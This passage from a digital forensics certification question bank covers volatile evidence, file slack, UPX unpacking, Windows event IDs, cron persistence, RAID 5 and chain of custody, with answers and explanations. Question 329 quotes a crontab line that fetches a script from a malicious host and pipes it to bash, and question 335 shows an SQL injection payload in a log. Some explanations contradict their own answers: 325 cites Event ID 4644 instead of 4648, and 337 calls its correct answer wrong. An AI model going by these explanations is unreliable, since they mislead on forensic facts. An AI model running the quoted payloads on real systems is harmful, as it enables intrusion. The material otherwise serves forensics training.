Disconnecting the network cable immediately stops the active C2 communication, preventing further data exfiltration and command injection while preserving the current state of memory and disk. This action maintains the integrity of volatile evidence (e.g., network connections, running processes) and avoids the data loss that would occur with a shutdown or the evidence contamination that would result from running a scan.

Exam trap

EC-Council often tests the misconception that a full disk image is always the first priority, but in an active C2 scenario, network isolation must come first to prevent ongoing damage and preserve volatile evidence.

How to eliminate wrong answers

Option A is wrong because creating a full disk image before isolating the system allows the active C2 connection to continue exfiltrating data and potentially destroying evidence during the imaging process. Option C is wrong because immediately shutting down the system destroys volatile evidence (e.g., network connections, running processes, memory-resident malware) and may trigger anti-forensic mechanisms that wipe logs or encrypt data. Option D is wrong because running a full antivirus scan modifies the system state (e.g., file access times, registry keys) and may alert the attacker, causing them to terminate the C2 session or trigger a kill switch, thereby losing evidence of the active connection.

323
MCQmedium

During an investigation, an analyst recovers a file from unallocated space that contains fragments of a deleted document. The file size is 512 bytes, but the cluster size of the volume is 4096 bytes. What is the term for the unused bytes between the end of the file and the end of the last cluster?

A.Volume slack
B.Drive slack
C.File slack
D.RAM slack
AnswerC

File slack is the unused bytes from the logical end of a file to the end of the last cluster allocated to that file, and it is the correct location for recovered remnant data. It consists of RAM slack (up to the sector boundary) plus the remaining bytes in the trailing cluster, which are typically not zeroed by the filesystem. Because old data can persist there after a file is overwritten or deleted, forensic examiners regularly recover intact fragments from file slack.

Why this answer

File slack refers to the unused bytes between the end of a file and the end of the last cluster allocated to that file. In this scenario, the file is 512 bytes but resides in a 4096-byte cluster, leaving 3584 bytes of slack space. This area can contain remnants of previously deleted data or metadata, making it a critical forensic artifact.

Exam trap

EC-Council often tests the distinction between RAM slack and file slack, and the trap here is that candidates confuse 'file slack' with 'RAM slack' because both involve unused bytes, but file slack encompasses the entire cluster remainder, while RAM slack is only the sector-level portion.

How to eliminate wrong answers

Option A is wrong because volume slack is the unused space at the end of a volume or partition, not between the end of a file and its cluster boundary. Option B is wrong because drive slack is not a standard forensic term; it is often confused with volume slack or unallocated space on the entire drive. Option D is wrong because RAM slack specifically refers to the unused bytes between the end of a file and the end of the sector (typically 512 bytes) that are filled with RAM contents during a write operation, not the cluster-level slack described here.

324
Multi-Selectmedium

A malware analyst is examining a suspicious Windows executable that appears to be packed. During static analysis, the analyst notices that the PE file has a small number of imports, a high entropy in the .text section, and a section named UPX0. The analyst suspects the sample is packed with UPX. Which TWO of the following techniques would BEST allow the analyst to unpack the sample and continue analysis? (Choose two.)

Select 2 answers
A.Use a debugger to set a breakpoint at the entry point and manually reconstruct the import address table.
B.Run the sample in a sandbox and dump the process memory after it unpacks itself.
C.Use the UPX utility with the -d option to decompress the executable.
D.Perform a strings analysis on the packed binary to extract the original source code.
E.Use a PE editing tool to change the section name from UPX0 to .text and then run the sample.
AnswersB, C

If the sample is UPX-packed, it will unpack itself in memory during execution. By running it in a controlled sandbox and dumping the process memory after the unpacking stub completes, the analyst can capture the original unpacked code. This technique works even if the UPX utility fails due to modified headers or custom packing, and it provides a memory image that can be analyzed with tools like Volatility or PE-scan.

Why this answer

UPX-packed executables can be unpacked either by using the UPX utility with the decompress option or by allowing the sample to unpack in memory and then dumping the process. The UPX utility directly reverses the compression if the file is unmodified. Memory dumping captures the unpacked code after the stub runs, which is effective even if the packer was customized.

Other methods like strings analysis or section renaming do not achieve unpacking.

Exam trap

The trap here is believing that renaming a packer section or performing strings analysis can unpack the binary, when unpacking requires either the packer's own decompression routine or runtime memory extraction.

325
MCQhard

A security analyst reviews the following Windows Event log entry: Event ID 4648 with logon type 3, subject user 'CONTOSO\admin', target server 'FS01', target user 'CONTOSO\backupadmin'. What does this event indicate?

A.A user account was created for backupadmin on FS01
B.A service was installed under the backupadmin account
C.An explicit credential logon was performed to access FS01 using the backupadmin account
D.The backupadmin account locked out due to multiple failed attempts
AnswerC

This option correctly identifies the event. Event ID 4644 is triggered when a process attempts to log on by explicitly supplying account credentials, commonly via RunAs, scheduled tasks, or mapped drives. Combined with logon type 3 (network logon), it indicates that the backupadmin account was explicitly used to authenticate to FS01 over the network, rather than through the interactive console.

Why this answer

Event ID 4648 with logon type 3 indicates a network logon where explicit credentials were supplied. The subject user 'CONTOSO\admin' attempted to access the target server 'FS01' using the target user 'CONTOSO\backupadmin' account, meaning the admin explicitly provided backupadmin's credentials for that network connection, rather than using their own.

Exam trap

The trap here is confusing Event ID 4648 (explicit credential logon) with account creation (4720) or lockout (4740) events, leading candidates to pick a plausible but incorrect option based on the user names involved.

How to eliminate wrong answers

Option A is wrong because Event ID 4648 does not indicate user account creation; account creation is logged with Event ID 4720. Option B is wrong because service installation is logged with Event ID 4697 or 7045, not 4648. Option D is wrong because account lockout is logged with Event ID 4740, and Event ID 4648 does not record failed attempts or lockout status.

326
MCQhard

An analyst is investigating a Linux server that suffered a data breach. The attacker deleted several log files. The analyst runs `debugfs /dev/sda1` and issues the command `lsdel`. What is the purpose of this command in the context of file recovery?

A.List inodes of deleted files that still have allocated blocks
B.Recover deleted files from the journal
C.List all deleted directory entries in the journal
D.Display the current superblock information
AnswerA

The `lsdel` command in debugfs scans the filesystem's inode table for inodes marked as deleted but still retaining allocated blocks, indicating their data blocks have not yet been freed. It outputs a list of such inode numbers, along with size and block counts, serving as recovery candidates. This is a listing operation only; actual recovery would require separate steps like `dump` or manual block reassembly.

Why this answer

The `lsdel` command in `debugfs` lists inodes of deleted files that still have allocated data blocks. This is critical in forensic analysis because even after a file is deleted, its inode and data blocks may remain intact until overwritten, allowing recovery of the file's contents.

Exam trap

The trap here is that candidates confuse `lsdel` with a recovery command, but it only lists recoverable inodes, not the actual file contents, and they may mistakenly think it interacts with the journal or superblock.

How to eliminate wrong answers

Option B is wrong because `lsdel` does not recover files from the journal; it only lists inodes of deleted files with allocated blocks, and recovery requires additional steps like `dump` or `cat`. Option C is wrong because `lsdel` does not list directory entries in the journal; it operates on the inode table, not the journal, and directory entries are handled by `ls -d` or `ls -i` in debugfs. Option D is wrong because `lsdel` does not display superblock information; that is done with the `stats` command in debugfs.

327
MCQmedium

A first responder arrives at a suspected intrusion scene. A desktop computer is powered on and logged in. The user claims they saw suspicious files being copied to a USB drive. Which of the following should the first responder do FIRST?

A.Capture volatile data such as memory and running processes.
B.Power off the computer immediately to prevent further data loss.
C.Photograph the scene and document everything in a notebook.
D.Create a forensic image of the hard drive using a write blocker.
AnswerA

Volatile data must be collected first because RAM, active network connections, and running processes exist only while the system is powered. A memory dump can recover encryption keys, injected malicious code, and open handles, while a process listing and netstat output capture attacker activity that would vanish at shutdown. This follows the order of volatility, moving from the most ephemeral evidence to the least ephemeral evidence.

Why this answer

In a live intrusion where a USB transfer is in progress, volatile data (memory, running processes, network connections) is the most ephemeral and will be lost if the system is powered down. Capturing this data first preserves evidence of the malicious activity, such as the process that initiated the copy and any network connections, which is critical for reconstructing the attack. This follows the order of volatility (RFC 3227), which mandates capturing volatile data before non-volatile data.

Exam trap

The CHFI exam often tests the principle of the order of volatility, and the trap here is that candidates mistakenly prioritize preserving the hard drive (non-volatile) over capturing volatile data, thinking that powering off or imaging the drive first prevents evidence tampering.

How to eliminate wrong answers

Option B is wrong because powering off the computer immediately destroys volatile evidence (e.g., memory contents, running processes, network connections) and may trigger anti-forensic mechanisms that wipe or encrypt data. Option C is wrong because photographing and documenting the scene, while important, is a secondary step that should occur after volatile data capture to avoid losing transient evidence. Option D is wrong because creating a forensic image of the hard drive is a non-volatile acquisition step that should be performed after volatile data has been secured, and doing it first risks overwriting or losing memory-resident evidence.

328
MCQhard

A forensic analyst is examining a Windows system and finds a prefetch file named NOTEPAD.EXE-12345678.pf. What information can be gleaned from this artifact? (Select the BEST answer.)

A.It saves a copy of the application's configuration
B.It logs all network connections made by the application
C.It records the application's execution count and last run time
D.The file contains the user's password for the application
AnswerC

Prefetch is best known to forensic examiners for its run-count and timestamp metadata: every .pf file includes a 'Run Count' value and at least one 'Last Run Time' timestamp in its header. The run count indicates how many times the corresponding executable has been launched, while the last run time gives the most recent start date and time in UTC. This is the correct characteristic of Prefetch and is what analysts rely on to establish program execution frequency and recency during an investigation. The file's name itself, such as NOTEPAD.EXE-3A5F1E2D.pf, ties the metadata to a specific program.

Why this answer

Prefetch files in Windows are designed to speed up application startup by caching information about the files loaded during the first few seconds of execution. The filename includes the application name and a hash of the file path, while the internal metadata records the execution count and last run time, making option C correct.

Exam trap

The trap here is that candidates confuse prefetch files with other Windows artifacts like jump lists or registry MRU lists, assuming they store more data (e.g., passwords or network logs) than they actually do. In CHFI exam context, remember that prefetch files provide execution count and last run time only.

How to eliminate wrong answers

Option A is wrong because prefetch files do not store application configuration; configuration is typically saved in the registry (e.g., HKCU\Software) or in .ini/.xml files. Option B is wrong because network connections are logged by the Windows Filtering Platform (WFP) or firewall logs, not by prefetch files. Option D is wrong because prefetch files contain no user credentials; passwords are stored in memory, LSASS process, or credential manager, not in prefetch artifacts.

329
MCQmedium

During an incident response, an analyst finds the following entry in /etc/crontab: */5 * * * * root /bin/bash -c 'curl -s http://malicious.com/script.sh | bash'. What is the MOST likely purpose of this entry?

A.Persistence mechanism to maintain access
B.Log cleanup tool
C.System backup script
D.Software update process
AnswerA

The five-minute cron interval re-executes a remote payload via curl piped to bash, so the implant reinstalls itself after reboots or kills. This satisfies the attacker's need to retain access, making it a persistence mechanism rather than one-off execution.

Why this answer

The crontab entry executes a command every 5 minutes that downloads and runs a script from a remote server. This is a classic persistence technique used by attackers to ensure that even if the initial access vector is removed, the malicious code will be re-executed on a regular schedule, maintaining their foothold on the system.

Exam trap

The EC-CHFI exam often tests the distinction between legitimate administrative tasks (like backups or updates) and malicious persistence mechanisms, where the key differentiator is the use of an untrusted external source and the 'curl | bash' pattern that executes arbitrary code without verification.

How to eliminate wrong answers

Option B is wrong because log cleanup tools typically use commands like 'rm' or 'truncate' on log files, not 'curl' to fetch external scripts. Option C is wrong because system backup scripts usually involve 'rsync', 'tar', or 'dd' to local or trusted storage, not downloading and executing arbitrary code from an external URL. Option D is wrong because legitimate software update processes use signed packages, checksums, and trusted repositories (e.g., 'apt-get update' or 'yum update'), not an unverified 'curl | bash' from a suspicious domain.

330
Multi-Selectmedium

Which TWO of the following are essential components of chain of custody documentation?

Select 2 answers
A.Every person who handled the evidence must sign and date the form
B.A detailed description of the evidence including make, model, and serial number
C.The forensic tool used to analyze the evidence
D.The evidence must be stored in a fireproof safe
E.The final analysis report
AnswersA, B

Each individual who takes custody of the evidence must record their name, the date, and the time on the chain-of-custody form. This creates a chronological audit trail proving that the item was continuously controlled, so a court can presume no tampering occurred. If a single transfer lacks a signature and date, the chain is broken and the evidence may be excluded as lacking authenticity.

Why this answer

Option A is correct because chain of custody requires an unbroken, auditable record of possession, so every individual who handled the evidence must sign and date the form to establish accountability and continuity. Option B is correct because the evidence must be uniquely and precisely identified—including make, model, and serial number—so it can be distinguished from similar items and matched to the custody entries. Option C is not essential to chain of custody itself; the forensic tool used belongs to the analysis methodology and is documented in the examination report, not the custody log.

Option D is not required; evidence must be secured against tampering, but a fireproof safe is a storage recommendation, not a chain-of-custody component. Option E is not part of chain of custody; the final analysis report documents findings and conclusions, not the chronological transfer and handling of the evidence.

Exam trap

EC-Council often tests the distinction between what belongs in chain of custody documentation versus what belongs in the forensic analysis report or security procedures, leading candidates to mistakenly include analysis tools or storage specifications.

331
MCQeasy

What is the PRIMARY purpose of a chain of custody document in a forensic investigation?

A.To provide a chronological record of who handled the evidence, when, and why.
B.To document the tools used during the investigation.
C.To list all the files found on the suspect's computer.
D.To authorize the search and seizure of digital evidence.
AnswerA

The chain of custody document exists to create a verifiable, chronological account of every individual who came into possession of evidence, along with the specific timestamps and reasons for each transfer. This unbroken record is what establishes the item's integrity and continuity from collection through courtroom presentation, assuring the fact-finder that the evidence was not altered, substituted, or contaminated. Without a defensible chain of custody, even forensically sound evidence may be ruled inadmissible.

Why this answer

The chain of custody document is the foundational record that ensures evidence integrity and admissibility in court. Its primary purpose is to create a chronological, unbroken log of every person who handled the evidence, the exact time and date of each transfer, and the reason for the transfer. This directly supports the legal requirement to prove that the evidence has not been tampered with or altered from the moment of seizure to its presentation in court.

Exam trap

EC-Council often tests the distinction between the chain of custody (which tracks handling history) and the search warrant (which grants legal authority), causing candidates to mistakenly choose the authorization option.

How to eliminate wrong answers

Option B is wrong because documenting the tools used during the investigation is a separate activity, typically recorded in a forensic workstation log or case notes, not in the chain of custody form. Option C is wrong because listing files found on a suspect's computer is the output of forensic analysis (e.g., a file listing from a tool like FTK Imager or EnCase), not the purpose of the chain of custody document. Option D is wrong because authorization for search and seizure is obtained via a legal warrant or consent form, not through the chain of custody; the chain of custody begins after the evidence has been legally seized.

332
MCQhard

An incident responder examines a Linux server and finds a suspicious cron job that runs every minute and executes a script located in /tmp. Which persistence technique does this represent?

A.Kernel rootkit
B.Web shell
C.SSH key backdoor
D.Cron-based persistence
AnswerD

Cron-based persistence occurs when an attacker adds a job to a user's crontab, /etc/cron.d/, or an /etc/cron.* directory so that the system executes a reverse shell, beacon, or re-implant command at regular intervals. The job runs with the crontab owner's privileges, survives reboots, and can be hidden with output redirection; a finding of a suspicious timer entry is strong evidence of this persistence technique.

Why this answer

Cron is a Linux job scheduler that executes tasks at specified intervals. A cron job running every minute from /tmp indicates an attacker has added a persistent scheduled task to maintain access, which is a classic example of cron-based persistence. This technique leverages the cron daemon (crond) to re-execute malicious code automatically, ensuring the attacker's foothold survives reboots.

Exam trap

This question tests the distinction between user-space persistence mechanisms (like cron) and kernel-level or network-accessible backdoors. Candidates may confuse cron jobs with rootkits or web shells due to overlapping goals of maintaining access.

How to eliminate wrong answers

Option A is wrong because a kernel rootkit operates at the kernel level, modifying system calls or kernel modules to hide processes or files, not by adding user-space cron jobs. Option B is wrong because a web shell is a script (e.g., PHP, ASP) uploaded to a web server's accessible directory to execute commands via HTTP, not a cron job in /tmp. Option C is wrong because an SSH key backdoor involves placing an attacker's public key in ~/.ssh/authorized_keys to allow passwordless login, not scheduling a recurring script via cron.

333
MCQmedium

Which of the following email headers is used to verify the domain of the sending server and is commonly used for authentication to prevent spoofing?

A.Content-Type
B.Received
C.X-Mailer
D.DKIM-Signature
AnswerD

DKIM-Signature carries a cryptographic signature created with the sending domain's private key, letting the receiver validate that the message genuinely originated from that domain and was not altered in transit. This directly satisfies the stem's requirement to verify the sending server's domain and prevent spoofing.

Why this answer

DKIM-Signature is the correct answer because it is an email authentication method that uses a digital signature to verify the domain of the sending server. It allows the receiver to check that the email was not forged or altered during transit, directly preventing domain spoofing. This header is defined in RFC 6376 and is a core component of email authentication frameworks like DMARC.

Exam trap

EC-Council often tests the distinction between headers used for authentication (DKIM-Signature) versus headers used for routing or metadata (Received, X-Mailer), leading candidates to mistakenly choose Received because it shows server hops, but it does not verify domain ownership.

How to eliminate wrong answers

Option A is wrong because Content-Type is a MIME header that specifies the media type of the message body (e.g., text/plain or multipart/mixed) and has no role in authentication or spoofing prevention. Option B is wrong because Received is a trace header added by each mail transfer agent (MTA) along the delivery path; it is used for routing diagnostics and forensic tracing, not for verifying the sending domain's authenticity. Option C is wrong because X-Mailer is an informal header that indicates the email client software used to compose the message (e.g., Outlook or Thunderbird) and is easily forged, providing no security or authentication function.

334
MCQeasy

During a mobile forensic examination of an iPhone, the examiner wants to acquire the most data possible, including deleted files and unallocated space. Which acquisition type should be used?

A.File system acquisition
B.Logical acquisition
C.Physical acquisition
D.Manual acquisition
AnswerC

Physical acquisition is the only method that produces a bit-for-bit image of the device's storage, including allocated files, deleted file remnants, and unallocated space, by reading the raw NAND or a block device representation. On iPhones this is technically challenging because modern devices implement full-disk encryption and a Secure Enclave; physical imaging is usually feasible only with bootrom exploits (e.g., checkm8 on A7–A11 chips) or decapsulation/chip-off methods. Once acquired, the raw image allows deep data carving and, if decryption keys are available, complete logical recovery.

Why this answer

Physical acquisition creates a bit-for-bit copy of the entire flash storage, including unallocated space and deleted file remnants. This is the only method that captures the raw NAND memory, allowing recovery of data from unallocated blocks and slack space that logical and file system acquisitions skip.

Exam trap

The CHFI exam often tests the misconception that logical acquisition (Option B) captures deleted data because it includes the iTunes backup, but backups exclude unallocated space and deleted file remnants.

How to eliminate wrong answers

Option A is wrong because file system acquisition only retrieves allocated files and metadata visible to the operating system, ignoring unallocated space and deleted data. Option B is wrong because logical acquisition extracts files and directories via the iOS API (e.g., iTunes backup), which excludes unallocated space and deleted file remnants. Option D is wrong because manual acquisition involves physically interacting with the device screen to capture visible data, providing no access to the underlying storage or deleted content.

335
MCQmedium

An analyst examining Apache access logs finds the following entry: 192.168.1.10 - - [10/Oct/2023:13:55:36 -0400] "GET /search.php?q=1'%20OR%20'1'='1 HTTP/1.1" 200 5324 "-" "Mozilla/5.0". Which of the following attacks is MOST likely occurring?

A.SQL injection
B.Cross-site scripting (XSS)
C.Remote file inclusion
D.Path traversal
AnswerA

The payload contains SQL code trying to manipulate the query.

Why this answer

The log entry shows a GET request to /search.php with a query parameter q containing the SQL injection payload 1' OR '1'='1. This classic tautology-based SQL injection attempts to manipulate the SQL query to always return true, potentially bypassing authentication or extracting data. The 200 OK response and 5324 bytes indicate the server processed the malicious input, confirming the attack is SQL injection.

Exam trap

EC-Council often tests the distinction between SQL injection and XSS by using payloads that contain SQL syntax; here the single quote and OR '1'='1 tautology clearly target the database layer, not client-side script execution. Candidates might instead confuse this with path traversal or remote file inclusion, but the query-string SQL tautology confirms SQL injection.

How to eliminate wrong answers

Option B is wrong because cross-site scripting (XSS) would inject client-side scripts (e.g., <script>alert(1)</script>) into the response, not SQL tautologies; the payload here targets the database, not the browser. Option C is wrong because remote file inclusion (RFI) involves including a remote file via a URL (e.g., http://evil.com/shell.txt), not a SQL tautology in a query parameter. Option D is wrong because path traversal uses directory traversal sequences (e.g., ../../../etc/passwd) to access files outside the web root, not SQL syntax to manipulate database queries.

336
MCQhard

A forensic investigator analyzing a RAID 5 array of three disks notices that one disk has failed. Can the investigator still reconstruct the data?

A.Yes, using the parity information from the remaining disks
B.No, RAID 5 requires all disks to be present
C.Yes, but only if the failed disk is the parity disk
D.No, because RAID 5 does not support hot swapping
AnswerA

RAID 5 uses a distributed parity scheme in which data and parity are interleaved across every disk in the array. If any single disk fails, the missing data can be reconstructed on-the-fly by reading the corresponding data and parity stripes from the two surviving disks and performing an XOR calculation. In a three-disk RAID 5, two remaining disks always provide enough information to rebuild the lost stripe, allowing the array to continue operating in a degraded state until the failed disk is replaced.

Why this answer

RAID 5 uses distributed parity across all disks in the array. When one disk fails, the data can be reconstructed by XORing the data and parity from the remaining disks. Since the parity is spread across all disks (not a dedicated parity disk), the investigator can rebuild the missing data as long as the remaining disks are functional.

Exam trap

The trap here is that candidates often confuse RAID 5 with RAID 4 (which uses a dedicated parity disk) or incorrectly assume that all disks must be present for data access, when in fact RAID 5 is fault-tolerant to a single disk failure.

How to eliminate wrong answers

Option B is wrong because RAID 5 is specifically designed to tolerate a single disk failure; it does not require all disks to be present for data reconstruction. Option C is wrong because RAID 5 does not have a dedicated parity disk; parity is distributed across all disks, so the failure of any single disk is recoverable regardless of which disk fails. Option D is wrong because hot swapping is a hardware feature unrelated to the ability to reconstruct data; RAID 5 supports reconstruction even without hot swapping, as long as the array is not degraded further.

337
MCQeasy

In a macOS forensic investigation, which log system provides a timeline of high-level system events such as application launches and user logins?

A.syslog
B.FSEvents
C..plist files
D.Unified logging
AnswerD

Unified logging is the modern, centralized logging architecture on macOS, introduced in macOS 10.12, which aggregates all system and user-level log messages into a high-performance, structured data store accessible via the `log` command and Console app. It captures high-level forensic events such as logon/logoff, application launches, and background daemon activity, along with rich metadata like timestamps, process IDs, and privacy-annotated content. This makes Unified logging the authoritative artifact for investigating high-level system events because it provides a unified, queryable, and tamper-resistant timeline of system activity.

Why this answer

Unified logging is the correct answer because it is the comprehensive logging system in macOS that captures high-level system events such as application launches and user logins, providing a timeline for forensic analysis. FSEvents, on the other hand, only records file system changes at the directory level.

Exam trap

Candidates may incorrectly assume that FSEvents records high-level system events due to its name, but it only captures file system changes. Unified logging is the primary source for application launches and user logins.

How to eliminate wrong answers

Option A is wrong because syslog is a legacy Unix logging system that collects kernel and application messages but does not specifically track high-level system events like application launches or user logins in a structured timeline; it is more generic and less forensically focused on user actions. Option C is wrong because .plist files are property list files used for storing application preferences and configuration data, not for logging system events or providing a timeline of user activity. Option D is wrong because Unified logging (os_log) is the modern macOS logging framework that captures detailed debug and system messages, but it is not designed to provide a persistent, high-level timeline of events like FSEvents; it is more granular and ephemeral unless specifically configured for persistence.

338
MCQmedium

A forensic investigator is examining a compromised database server running Microsoft SQL Server 2019. The attacker gained access and executed several destructive queries. The investigator needs to determine the exact time and text of the malicious queries. The database is configured with the full recovery model, and transaction log backups are available. Which of the following should the investigator use to recover the query text?

A.Restore the database from the last full backup, then use SQL Server Profiler to capture live queries as they are re-executed.
B.Use a third-party log reader tool that parses the transaction log and extracts the query text from log records, such as ApexSQL Log or Quest Toad.
C.Use the sys.fn_dblog function to read the active transaction log and filter for LOP_INSERT_ROWS and LOP_DELETE_ROWS operations.
D.Use the sys.dm_exec_query_stats dynamic management view to retrieve the query text and execution statistics.
AnswerB

Third-party log reader tools can parse the transaction log and reconstruct the exact query text from log records, including the time and user. They are designed for forensic analysis of SQL Server logs and can extract detailed information even from inactive log portions, provided the log has not been truncated.

Why this answer

The transaction log in full recovery model records all transactions, but the native sys.fn_dblog function does not directly provide query text. Specialized third-party log reader tools can interpret log records and reconstruct the original queries, including the exact text and timing. This is the most reliable method for forensic recovery of query text from SQL Server transaction logs.

Exam trap

The trap here is assuming that built-in SQL Server functions like sys.fn_dblog provide complete query text without additional parsing.

339
MCQhard

An analyst performs forensic imaging using the command: dcfldd if=/dev/sda of=image.dd hash=sha256 hashlog=hash.txt bs=4096 conv=noerror,sync. What is the PRIMARY purpose of the 'hash=sha256' and 'hashlog=hash.txt' parameters?

A.To encrypt the image file to prevent unauthorized access.
B.To compress the image to save disk space.
C.To ensure the image is an exact bit-for-bit copy and provide an integrity check.
D.To split the image into smaller chunks for easier transport.
AnswerC

The hash option in dcfldd calculates a cryptographic digest of every bit read from the source device, creating a unique digital fingerprint of the acquired data. Hashing ensures that the resulting image is a bit-for-bit copy and allows the examiner to later run the same algorithm to confirm the image has not been modified, which is essential for maintaining evidence integrity in legal proceedings.

Why this answer

The `hash=sha256` parameter instructs dcfldd to compute a SHA-256 hash of the input data as it is read, and `hashlog=hash.txt` writes that hash value to a separate file. This allows the analyst to later verify that the forensic image (`image.dd`) is an exact bit-for-bit copy of the source (`/dev/sda`) by recomputing the hash and comparing it to the stored value, ensuring data integrity and admissibility in court.

Exam trap

EC-Council often tests the distinction between hashing (integrity) and encryption (confidentiality), so the trap here is that candidates confuse the purpose of a hash algorithm with that of an encryption cipher, leading them to incorrectly select Option A.

How to eliminate wrong answers

Option A is wrong because hashing (SHA-256) is a one-way cryptographic function used for integrity verification, not encryption; it does not protect the image from unauthorized access. Option B is wrong because dcfldd does not compress data; the `conv=noerror,sync` parameter handles error recovery, and hashing adds no compression—disk space is not saved. Option D is wrong because dcfldd does not split the output into chunks; the `of=image.dd` writes a single contiguous file, and splitting would require additional parameters like `split=...` or a separate tool.

340
MCQhard

In a Google Cloud Platform (GCP) environment, a forensic investigator needs to determine who deleted a Cloud Storage bucket and when. Which log type should be queried to obtain this information?

A.Cloud Monitoring metrics
B.VPC flow logs
C.Cloud Storage access logs
D.Cloud Audit Logs (Admin Activity)
AnswerD

Cloud Audit Logs (Admin Activity) are the correct source because they capture all control-plane API calls that modify configuration or metadata, including the storage.buckets.delete method that removes a Cloud Storage bucket. These administrative audit logs record the authenticated principal, the API method, the target resource, the request metadata, and the response status, giving investigators a complete attribution trail for the deletion. This audit log is enabled by default in GCP for all projects, making it the authoritative forensic evidence for bucket deletion events.

Why this answer

Cloud Audit Logs (Admin Activity) in GCP record all API calls that modify the configuration or metadata of resources, including the deletion of a Cloud Storage bucket. These logs capture the identity of the principal who performed the action, the timestamp, and the specific operation (e.g., `storage.buckets.delete`), making them the authoritative source for answering who deleted a bucket and when.

Exam trap

EC-Council CHFI often tests the distinction between data-plane logs (access logs) and control-plane logs (admin activity audit logs), and the trap here is that candidates mistakenly choose Cloud Storage access logs because they associate 'deletion' with bucket-level activity, not realizing that bucket deletion is a configuration change logged only in Admin Activity audit logs.

How to eliminate wrong answers

Option A is wrong because Cloud Monitoring metrics provide performance and utilization data (e.g., request counts, latency) but do not log identity or timestamps of specific administrative actions like bucket deletion. Option B is wrong because VPC flow logs capture network traffic metadata (source/destination IP, ports, protocol) for packets flowing through VPC networks, not control-plane operations such as bucket deletion. Option C is wrong because Cloud Storage access logs (also known as usage logs) record data-access events (e.g., object reads, writes) at the bucket level, but they do not capture admin-level changes like bucket deletion; deletion of the bucket itself is a configuration change logged only in Admin Activity audit logs.

341
Multi-Selectmedium

A forensic investigator is examining a Linux system compromised via a web application. Which THREE artifacts should the investigator prioritize to determine the attacker's entry point and post-exploitation activities?

Select 3 answers
A./home/compromised_user/.bash_history
B./etc/shadow
C./var/log/auth.log
D.Cron job entries in /etc/crontab
E.Web server access logs (e.g., /var/log/apache2/access.log)
AnswersA, C, E

Bash history is the strongest indicator of the attacker's hands-on-keyboard activity after an initial foothold is established, recording the exact commands typed into an interactive shell such as ssh. Because it contains a chronological command sequence, it can reveal what binaries were downloaded, permissions changed, persistence mechanisms planted, and data exfiltrated. Although a sophisticated attacker may clear or disable history, its presence in this scenario makes it the definitive artifact for reconstructing post-exploitation actions.

Why this answer

Option A, /home/compromised_user/.bash_history, is correct because the shell history file records the exact commands the attacker typed after gaining access, directly revealing post-exploitation activities such as reconnaissance, privilege escalation attempts, and persistence commands. Option C, /var/log/auth.log, is correct because it captures authentication events including sudo usage, su attempts, SSH logins, and PAM failures, which help establish how the attacker escalated privileges or moved laterally after the initial web compromise. Option E, web server access logs (e.g., /var/log/apache2/access.log), is correct because they record HTTP requests with source IPs, URIs, and status codes, allowing the investigator to identify the malicious request that exploited the web application and thus the entry point.

Option B, /etc/shadow, is not a priority artifact here because it only stores password hashes and does not by itself show attacker activity or entry vectors. Option D, cron job entries in /etc/crontab, is not among the top three because while cron can indicate persistence, it is less directly tied to identifying the entry point and immediate post-exploitation actions than the history, auth, and access logs.

Exam trap

EC-Council often tests the distinction between artifacts that record past events (logs, history) versus configuration files that define system behavior (shadow, crontab), leading candidates to mistakenly choose /etc/shadow or cron entries as forensic evidence of attacker actions.

342
MCQmedium

A forensic examiner is analyzing an Android device that has been factory reset. Which artefact is MOST likely to persist after a factory reset, providing potential evidence of prior usage?

A.Google account artefacts
B.App installation logs
C.Deleted SMS messages
D.Wi-Fi passwords
AnswerA

On modern Android builds, factory reset intentionally preserves Factory Reset Protection (FRP) data—the last verified Google account identifier (and often an authentication token sealed with device-bound keys) is retained in dedicated persistent storage or in Google's cloud-side device registry. Even if the userdata partition is reformatted, a forensic examiner can extract the FRP Google account from a physical image of protected/persistent blocks or obtain it via Google Takeout/Google Dashboard log retrieval, making this the only listed item that survives by design.

Why this answer

Google account artefacts, such as the Google Services Framework (GSF) ID and the device's Google Account (GAIA) ID, may persist after a factory reset because they are often stored on a dedicated persistent partition (e.g., /persist or /misc) that is not erased by a standard reset. Forensic tools can recover these identifiers from that partition, providing evidence of prior usage. This is unlike user-generated data such as SMS, Wi-Fi passwords, or app logs, which reside in the /data partition and are typically wiped.

Exam trap

The trap is that a factory reset does not completely erase all data; certain system-level identifiers like Google account artefacts survive because they reside on partitions that are not formatted during a standard reset. Candidates often assume all user-related data is wiped, but persistent partitions retain these identifiers.

How to eliminate wrong answers

Option B is wrong because app installation logs are stored in /data/log/ or /data/system/packages.xml, which are cleared during a factory reset that reformats the /data partition, leaving no persistent trace. Option C is wrong because deleted SMS messages reside in the /data/data/com.android.providers.telephony/databases/mmssms.db file, which is fully wiped when the /data partition is reformatted during a factory reset, and they are not backed up to Google servers by default. Option D is wrong because Wi-Fi passwords are stored in /data/misc/wifi/wpa_supplicant.conf, which is deleted when the /data partition is wiped, and while some devices may retain them in a separate persist partition, a standard factory reset removes them.

343
MCQmedium

A forensic investigator uses the 'dd' command to create a forensic image. The original drive has a SHA-256 hash of a1b2c3... and the image produces the same hash. Which rule of evidence does this satisfy?

A.Reliability
B.Authenticity
C.Completeness
D.Admissibility
AnswerB

Authenticity in digital forensics means proving that the evidence is what it purports to be and has not been modified during acquisition or handling. When the hash computed from the original source matches the hash computed from the dd image, it demonstrates the image is a bit-for-bit copy with no data altered, added, or removed. This cryptographic match directly supports the authenticity/integrity of the evidence.

Why this answer

The SHA-256 hash of the original drive matches the hash of the forensic image, proving that the image is an exact, unaltered copy of the original. This satisfies the rule of authenticity, which requires that evidence be shown to be the same as what was originally seized and not tampered with. The hash acts as a digital fingerprint, and matching hashes confirm the integrity and origin of the evidence.

Exam trap

The trap here is that candidates confuse authenticity (proving the copy is identical to the original) with reliability (the tool's consistency), leading them to choose Option A instead of B.

How to eliminate wrong answers

Option A is wrong because reliability refers to the trustworthiness of the evidence collection process and tools, not the verification of an exact copy via hash matching. Option C is wrong because completeness requires that all data from the original source is captured, which is a separate concern from proving the copy is identical via hash verification. Option D is wrong because admissibility is a legal determination made by a court based on multiple factors (e.g., relevance, chain of custody), not a specific rule satisfied by matching hashes.

344
Multi-Selectmedium

Which TWO of the following are tools commonly used for network forensics analysis? (Select two.)

Select 2 answers
A.tcpdump
B.Autopsy
C.Volatility
D.dd
E.Wireshark
AnswersA, E

tcpdump is a command-line packet capture tool that uses the libpcap library to intercept and display network packets transiting a specific interface. It supports powerful Berkeley Packet Filter (BPF) syntax for targeted capture and can write raw packets to a pcap file, preserving the exact frame traversal timing and payloads crucial for reconstructing network events. Its headless, scriptable nature makes it the de facto standard for remote or unattended network forensics collection.

